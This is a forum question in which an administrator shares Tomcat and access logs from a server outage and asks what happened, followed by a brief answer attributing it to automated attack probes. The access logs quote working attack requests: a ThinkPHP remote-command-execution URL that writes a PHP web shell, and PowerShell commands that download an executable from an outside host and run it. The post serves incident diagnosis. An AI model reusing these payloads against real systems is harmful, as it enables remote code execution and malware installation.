-1

We have a java web application running in tomcat which is hosted in AWS. The operating system used in the server is Centos. Today it become inaccessible for more than 10 minutes. When we got access, we checked logs to understand what happened. Interestingly log contains the following

Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.

As I checked more I found no logs between the 2:22 PM to 2:39 PM which is the timerange where server becomes inaccessible.

Application Log :-

2019-07-17 14:20:11.620 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39208, 0) already exists.
2019-07-17 14:20:53.469 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39209, 0) already exists.
2019-07-17 14:21:32.329 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.473 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.987 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39213, 0) already exists.
2019-07-17 14:22:34.338 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39215, 0) already exists.
2019-07-17 14:45:04.900 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39217, 0) already exists.
2019-07-17 14:45:49.877 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39218, 0) already exists.
2019-07-17 14:47:14.155 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39219, 0) already exists.
2019-07-17 14:47:20.484 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39220, 0) already exists.
2019-07-17 14:49:09.092 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39221, 0) already exists.
2019-07-17 14:49:54.520 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39223, 0) already exists.

Access Log :-

[17/Jul/2019:14:22:27 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 200 -
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 166
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 431
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 281
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 1131
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 537
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 3484
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 23255
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3170
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44314
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3512
[17/Jul/2019:14:22:29 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3451
[17/Jul/2019:14:22:30 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 11953
[17/Jul/2019:14:22:31 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 16527
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44218
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 4695
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 3675
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7287
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 8066
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 9802
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 2634
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44122
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 2132
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44028
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 1800
[17/Jul/2019:14:39:38 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 4926
[17/Jul/2019:14:39:38 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:38 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:39 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:39:40 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 13606
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:39:42 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:42 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "POST /tmUnblock.cgi HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 200 1724
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:44 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354390370 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:44 +0530] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/vaadinBootstrap.js?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/themes/abcerp/styles.css?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354393114 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/popupbutton/popupbutton.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354389975 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/themes/valo/shared/img/spinner.gif HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/fi_jasoft_dragdroplayouts/dragdroplayouts.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_timeline/styles.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_calendar/calendar.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/easyuploads.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:47 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/filtertable/filtertable.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:54 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7730
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /?v-1563354393116 HTTP/1.1" 200 4843
[17/Jul/2019:14:39:55 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/abcerp/img/symphony.png HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Light-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Regular-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /APP/global/0/legacy/0/20180410112140264.png HTTP/1.1" 200 12363
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 8023
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=3 HTTP/1.1" 200 237
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=3 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:40:12 +0530] "GET / HTTP/1.1" 200 1706

Catalina Log :-

Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server version:        Apache Tomcat/7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server built:          Sep 14 2016 12:12:26 UTC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server number:         7.0.72.0
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Name:               Linux
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Version:            3.10.0-693.21.1.el7.x86_64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Architecture:          amd64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Java Home:             /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Version:           1.7.0_171-mockbuild_2018_02_27_14_27-b00
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Vendor:            Oracle Corporation
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_BASE:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_HOME:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.config.file=/var/abc/ERP/apache-tomcat-7.0.72/conf/logging.properties
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djdk.tls.ephemeralDHKeySize=2048
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dfile.encoding=UTF8
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dlog4j.ignoreTCL=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dserver.name=
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dorg.apache.catalina.loader.WebappClassLoader.ENABLE_CLEAR_REFERENCES=false
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dmail.debug=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Duser.timezone=GMT+5.30
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xms12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xmx12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:MaxPermSize=4096m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSClassUnloadingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSPermGenSweepingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+UseConcMarkSweepGC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:NewRatio=2
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDetails
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDateStamps
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:-HeapDumpOnOutOfMemoryError
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:HeapDumpPath=/var/abc/dump
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.endorsed.dirs=/var/abc/ERP/apache-tomcat-7.0.72/endorsed
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.base=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.home=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.io.tmpdir=/var/abc/ERP/apache-tomcat-7.0.72/temp
Jul 17, 2019 2:00:17 AM org.apache.catalina.core.AprLifecycleListener lifecycleEvent
INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: /usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:00:18 AM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 1898 ms
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardService startInternal
INFO: Starting service Catalina
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.72
Jul 17, 2019 2:00:18 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:33 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:33 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:00:53 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deploying web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war
Jul 17, 2019 2:00:53 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:56 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [/abcERP] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:56 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deployment of web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war has finished in 18,798 ms
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager has finished in 78 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples has finished in 388 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs has finished in 36 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager has finished in 29 ms
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.Catalina start
INFO: Server startup in 54377 ms
Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.
Jul 17, 2019 3:33:04 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "tomcat"
Jul 17, 2019 3:33:07 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "manager"
Jul 17, 2019 3:33:10 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "admin"
Jul 17, 2019 3:33:15 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "root"

Can someone explain what happened ?

Shakir
  • 1
  • 2

1 Answers1

0

It looks like some malicious actors automated attack tool tried to exploit tomcat. It's not guaranteed that the downtime is associated with this attack, because your Tomcat instance probably receives attacks like these a lot. I would suggest looking at other stuff which could have caused the downtime.

Raimonds Liepiņš
  • 994
  • 5
  • 9